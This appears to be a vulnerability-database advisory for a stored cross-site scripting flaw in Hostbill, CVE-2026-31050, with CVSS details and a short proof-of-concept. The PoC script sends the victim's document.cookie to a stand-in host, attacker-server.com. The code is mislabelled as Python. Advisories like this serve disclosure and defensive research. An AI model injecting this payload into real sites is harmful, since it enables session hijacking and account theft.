Cross Site Scripting vulnerability in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code
CVSS Details
CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Configurations (Affected Products)
No configuration data available.
Hostbill v.2025-11-24
Hostbill v.2025-12-01
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!--
PoC for Hostbill Stored XSS
Attacker injects payload into a vulnerable input field (e.g., Ticket Subject or Description)
-->
<script>
// Basic payload to test vulnerability
alert('CVE-2026-31050 XSS Triggered');
// Advanced payload to steal cookies (demonstration only)
var img = new Image();
img.src = "http://attacker-server.com/steal?c=" + document.cookie;
</script>